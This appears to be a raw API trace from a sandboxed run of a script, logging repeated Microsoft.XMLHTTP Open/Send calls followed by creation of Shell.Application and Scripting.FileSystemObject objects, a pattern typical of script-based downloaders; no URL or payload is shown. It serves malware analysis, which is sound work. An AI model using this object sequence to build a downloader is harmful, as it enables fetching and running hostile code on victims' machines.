	[0370.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.456] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.456] SysStringLen (param_1=0x0) returned 0x0
	[0370.456] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.457] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0370.457] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0370.457] ??2@YAPEAX_K@Z () returned 0x62f310
	[0370.457] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.457] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0370.457] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.457] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0370.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.457] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.457] SysStringLen (param_1=0x0) returned 0x0
	[0370.457] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.458] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0370.458] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7778) returned 0x0
	[0370.458] ??2@YAPEAX_K@Z () returned 0x62f330
	[0370.458] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7778, pUnkSite=0x62f330) 
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.458] XMLHTTPRequest:IUnknown:Release (This=0x49c7778) returned 0x0
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0370.458] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.458] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0370.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.458] longjmp () 
	[0370.458] longjmp () 
	[0370.459] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.459] SysStringLen (param_1=0x0) returned 0x0
	[0370.459] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.459] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0370.459] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0370.459] ??2@YAPEAX_K@Z () returned 0x62f310
	[0370.459] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.459] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0370.459] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.459] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0370.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.459] longjmp () 
	[0370.460] longjmp () 
	[0370.460] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.460] SysStringLen (param_1=0x0) returned 0x0
	[0370.460] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.460] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0370.460] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0370.460] ??2@YAPEAX_K@Z () returned 0x62f330
	[0370.460] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.460] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0370.460] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.460] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0370.460] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.461] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.461] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0370.461] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0370.767] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0370.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0370.768] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0370.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0370.768] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0370.768] SysStringLen (param_1=0x0) returned 0x0
	[0370.768] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0370.768] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0370.768] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0370.769] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0370.769] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0370.769] ??2@YAPEAX_K@Z () returned 0x62f350
	[0370.769] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0370.769] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0370.769] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0370.769] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0370.769] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0370.769] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0370.769] SysStringLen (param_1=0x0) returned 0x0
	[0370.769] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0370.772] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0370.772] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0370.772] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0370.772] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0370.772] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0370.773] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0371.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0371.631] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
